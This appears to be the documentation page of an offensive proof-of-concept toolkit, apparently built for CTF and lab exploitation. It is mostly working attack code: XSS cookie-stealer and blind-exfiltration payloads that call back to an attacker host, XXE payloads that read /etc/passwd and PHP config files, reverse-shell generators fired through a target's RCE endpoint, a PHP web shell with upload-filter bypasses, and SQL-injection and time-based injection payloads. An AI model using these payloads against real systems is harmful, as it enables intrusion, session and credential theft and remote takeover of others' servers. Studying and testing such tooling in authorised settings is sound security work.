Examples
Common POC patterns and code snippets.
Colored Output
Use colored output for better visibility instead of print():
from your_project.utils.output import out
out.success("Target is vulnerable!") # [+] Green
out.error("Connection failed") # [-] Red
out.info("Starting exploit") # [*] Blue
out.warning("Using default credentials") # [!] Yellow
out.debug(f"Response: {response.text}") # [DEBUG] Magenta
out.status("Extracting data...") # [...] Cyan
out.raw("No prefix") # No prefix, no color
XSS Payloads
Generate XSS payloads with automatic callbacks:
from your_project.utils.xss import img_onerror, blind_xss, cookie_stealer, polyglot
# Quick test payload
payload = img_onerror(f"http://{lhost}:8000")
# Cookie stealer with base64 encoding
payload = cookie_stealer(f"http://{lhost}:8000")
# Blind XSS with full context exfil
payload = blind_xss(f"http://{lhost}:8000", identifier="admin_panel")
# Polyglot (works in multiple contexts)
payload = polyglot(f"http://{lhost}:8000")
# Context-specific
from your_project.utils.xss import context_specific
payload = context_specific(f"http://{lhost}:8000", context="attribute")
# Contexts: html, attribute, js, css
XXE Exploitation
Generate XXE payloads for file reading and SSRF:
from your_project.utils.xxe import quick_test, basic_file_read, php_filter_b64
# Quick test (creates DTD + payload)
payload = quick_test(f"http://{lhost}:8000", "/etc/passwd")
# Writes DTD to payloads/xxe/xxe.dtd
# Basic file read (in-response)
payload = basic_file_read("/etc/passwd")
# PHP source via filter
payload = php_filter_b64("/var/www/html/config.php")
# Format-specific
from your_project.utils.xxe import svg_xxe, soap_xxe
svg_payload = svg_xxe(f"http://{lhost}:8000", "/etc/passwd")
# Get exfiltrated data
from your_project.utils.server_hooks import get_exfil
data = get_exfil(timeout=30)
Reverse Shells
Generate shells dynamically:
from your_project.utils.reverse_shells import bash_shell, python_oneliner, quick_bash
# Generate shell files
path = bash_shell("10.10.14.5", 4444)
# Creates: payloads/shells/rev_bash.sh
# Serve at: http://10.10.14.5:8000/shells/rev_bash.sh
# Get one-liner for direct RCE
cmd = python_oneliner("10.10.14.5", 4444)
# Use in: os.system(cmd) or RCE vulnerability
# Quick helper with download instructions
quick_bash(lhost, 4444) # Prints curl/wget commands
Shell Catcher
Catch reverse shells directly in Python (no netcat needed):
from your_project.utils.shell_catcher import ShellCatcher, auto_shell, quick_catch
# Method 1: Full control
catcher = ShellCatcher(4444)
catcher.start()
trigger_exploit()
if catcher.wait_for_shell(timeout=30):
catcher.stabilize() # Upgrade to PTY
catcher.interact() # Interactive shell!
# Method 2: Context manager (recommended)
with auto_shell(4444) as catcher:
trigger_exploit()
if catcher.shell_caught:
catcher.stabilize()
catcher.interact()
# Method 3: With trigger function
def trigger():
# Send reverse shell command to vulnerable target
cmd = python_oneliner(lhost, 4444)
# This makes the TARGET execute the reverse shell
requests.get(f"http://target/rce?cmd={cmd}")
quick_catch(4444, trigger_func=trigger)
File Upload
Upload files with bypass techniques:
from your_project.utils.file_upload import FileUploader, quick_upload
# Full control
uploader = FileUploader("http://target/upload")
result = uploader.upload_with_bypass(
"shell.php",
b"<?php system($_GET['cmd']); ?>",
techniques=["null_byte", "double_extension", "case_variation"]
)
# Simple upload
result = uploader.upload("shell.php", php_code)
# One-liner
quick_upload("http://target/upload", "shell.php", php_code)
Available bypass techniques:
null_byte: filename.php%00.jpgdouble_extension: filename.jpg.phpcase_variation: filename.PHPmime_mismatch: Send PHP as image/jpeg
Batch Requests
Intruder-style fuzzing with concurrency:
import httpx
from your_project.utils.batch_request import (
batch_request_sync,
generate_param_payloads,
generate_json_payloads
)
# Build base request
client = httpx.Client()
base = client.build_request(
"POST",
"http://target/api/login",
json={"username": "test", "password": "test"}
)
# Test SQL injection
sqli = ["' OR '1'='1", "admin'--", "' UNION SELECT NULL--"]
results = batch_request_sync(
base,
payloads=generate_json_payloads("username", sqli),
validate=lambda r: "dashboard" in r.text,
concurrency=5,
proxy="http://127.0.0.1:8080"
)
# Find successful payloads
for r in results:
if r.matched:
out.success(f"Valid: {r.payload}")
# Enumerate IDs
results = batch_request_sync(
client.build_request("GET", "http://target/api/user"),
payloads=generate_param_payloads("id", range(1, 1000)),
validate=lambda r: r.status_code == 200,
concurrency=50
)
Apache Hooks
Read callbacks from Apache logs instead of built-in server:
from your_project.utils.apache_hooks import get_cookie, get_exfil, get_param
# Get cookie from Apache logs
cookie = get_cookie('/var/log/apache2/access.log', timeout=30)
# Auto-decodes base64, returns most recent
# Get exfiltrated data
data = get_exfil('/var/log/apache2/access.log', timeout=30)
# Get custom parameter
value = get_param('data', '/var/log/apache2/access.log', timeout=30)
# Watch in real-time
from your_project.utils.apache_hooks import watch_log
watch_log('/var/log/apache2/access.log', params=['cookies', 'exfil'])
CLI watch mode:
uv run python -m your_project.utils.apache_hooks watch
uv run python -m your_project.utils.apache_hooks watch /var/log/apache2/access.log cookies exfil
Network Utilities
Get network interfaces and callback IPs:
from your_project.utils.network import get_interfaces, get_callback_host
# Get all interfaces
interfaces = get_interfaces()
# {'eth0': '10.10.14.5', 'tun0': '10.10.16.2', ...}
# Get best callback IP (prioritizes VPN)
lhost = get_callback_host()
# Returns: '10.10.16.2' (or best available)
Encoding Utilities
Common encoding operations:
from your_project.utils.encoding import (
b64_encode, b64_decode,
url_encode, url_decode,
to_hex, from_hex,
html_encode, html_decode
)
# Base64
encoded = b64_encode("admin:password")
decoded = b64_decode("YWRtaW46cGFzc3dvcmQ=")
# URL
safe = url_encode("../../etc/passwd")
unsafe = url_decode("%2e%2e%2f")
# Hex
hex_str = to_hex("ABCD") # "41424344"
text = from_hex("41424344") # "ABCD"
HTML Parsing
Easy BeautifulSoup wrapper:
from your_project.utils.html_parser import HTMLParser, quick_parse, parse_response
# Parse response
parser = HTMLParser.from_response(response)
# Find elements
form = parser.find_by_id("login-form")
inputs = parser.find_all_by_class("form-input")
links = parser.find_links()
# CSRF tokens
csrf = parser.find_csrf_token()
all_tokens = parser.find_all_csrf_tokens()
# Forms
forms = parser.find_forms()
for form in forms:
data = parser.extract_form_data(form)
print(f"Action: {form.get('action')}, Data: {data}")
# CSS selectors
hidden = parser.css_select("input[type='hidden']")
# Dump helpers
parser.dump_forms()
parser.dump_links()
Timing Attacks
For blind time-based exploitation:
from your_project.utils.timing import time_request
def attempt(payload):
return requests.get(f"http://target?id={payload}")
duration = time_request(attempt, "1' AND SLEEP(5)--")
if duration > 5:
out.success("Vulnerable to time-based SQLi!")
Zip Utilities
Create and extract zip files:
from your_project.utils.zip_util import quick_zip, zip_multiple, extract_zip
# Quick zip
quick_zip("payloads/", output="payloads.zip")
# Zip multiple files
zip_multiple(
["exploit.py", "shell.php", "config.json"],
output_path="poc.zip"
)
# Extract safely (prevents zip slip)
extract_zip("archive.zip", extract_to="./extracted")